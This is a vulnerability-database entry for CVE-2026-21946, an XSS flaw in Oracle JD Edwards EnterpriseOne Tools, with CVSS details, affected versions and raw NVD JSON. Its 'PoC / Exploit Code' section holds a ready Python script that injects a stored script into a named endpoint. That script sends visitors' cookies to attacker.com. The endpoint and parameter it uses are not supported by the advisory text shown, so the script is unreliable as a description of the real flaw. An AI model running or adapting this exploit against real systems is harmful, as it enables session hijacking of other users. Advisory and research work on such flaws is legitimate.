Security Vulnerability Report
中文
CVE-2026-21946 CVSS 6.1 MEDIUM

CVE-2026-21946

Published: 2026-01-20 22:15:58
Last Modified: 2026-01-29 20:48:16

Description

Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.0.0-9.2.26.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* - VULNERABLE
JD Edwards EnterpriseOne Tools 9.2.0.0
JD Edwards EnterpriseOne Tools 9.2.1.0
JD Edwards EnterpriseOne Tools 9.2.2.0
JD Edwards EnterpriseOne Tools 9.2.3.0
JD Edwards EnterpriseOne Tools 9.2.4.0
JD Edwards EnterpriseOne Tools 9.2.5.0
JD Edwards EnterpriseOne Tools 9.2.6.0
JD Edwards EnterpriseOne Tools 9.2.7.0
JD Edwards EnterpriseOne Tools 9.2.8.0
JD Edwards EnterpriseOne Tools 9.2.9.0
JD Edwards EnterpriseOne Tools 9.2.10.0
JD Edwards EnterpriseOne Tools 9.2.11.0
JD Edwards EnterpriseOne Tools 9.2.12.0
JD Edwards EnterpriseOne Tools 9.2.13.0
JD Edwards EnterpriseOne Tools 9.2.14.0
JD Edwards EnterpriseOne Tools 9.2.15.0
JD Edwards EnterpriseOne Tools 9.2.16.0
JD Edwards EnterpriseOne Tools 9.2.17.0
JD Edwards EnterpriseOne Tools 9.2.18.0
JD Edwards EnterpriseOne Tools 9.2.19.0
JD Edwards EnterpriseOne Tools 9.2.20.0
JD Edwards EnterpriseOne Tools 9.2.21.0
JD Edwards EnterpriseOne Tools 9.2.22.0
JD Edwards EnterpriseOne Tools 9.2.23.0
JD Edwards EnterpriseOne Tools 9.2.24.0
JD Edwards EnterpriseOne Tools 9.2.25.0
JD Edwards EnterpriseOne Tools 9.2.26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2026-21946 PoC - Stored XSS in JD Edwards EnterpriseOne Tools # Target: Oracle JD Edwards EnterpriseOne Tools <= 9.2.26.0 TARGET_URL = "https://target-host/jde/E1MenuPage.ISO" VULNERABLE_PARAM = "menuItemName" PAYLOAD = "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>" def exploit_cve_2026_21946(): """ Exploit for CVE-2026-21946: Stored XSS in Web Runtime SEC This PoC demonstrates how an attacker can inject malicious scripts that get stored and executed when other users access the page. """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml' } # Step 1: Inject malicious script via vulnerable parameter data = { VULNERABLE_PARAM: PAYLOAD, 'formAction': 'save' } print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Injecting payload: {PAYLOAD}") try: response = requests.post(TARGET_URL, data=data, headers=headers, timeout=30, verify=False) if response.status_code == 200: print("[+] Payload injected successfully") print("[*] The script will execute when users visit the affected page") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": exploit_cve_2026_21946()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21946", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:57.500", "lastModified": "2026-01-29T20:48:16.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.0.0-9.2.26.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto JD Edwards EnterpriseOne Tools de Oracle JD Edwards (componente: Web Runtime SEC). Versiones compatibles que están afectadas son 9.2.0.0-9.2.26.0. vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso de red vía HTTP comprometer JD Edwards EnterpriseOne Tools. Ataques exitosos requieren interacción humana de una persona que no sea el atacante y aunque la vulnerabilidad está en JD Edwards EnterpriseOne Tools, los ataques pueden impactar significativamente productos adicionales (cambio de alcance). Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de actualización, inserción o eliminación a algunos de los datos accesibles de JD Edwards EnterpriseOne Tools, así como acceso de lectura no autorizado a un subconjunto de los datos accesibles de JD Edwards EnterpriseOne Tools. Puntuación Base CVSS 3.1 de 6.1 (impactos en la Confidencialidad e Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0.0", "versionEndIncluding": "9.2.26.0", "matchCriteriaId": "8DA0C34B-7E0A-405C-819A-DCAF91A2C865"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}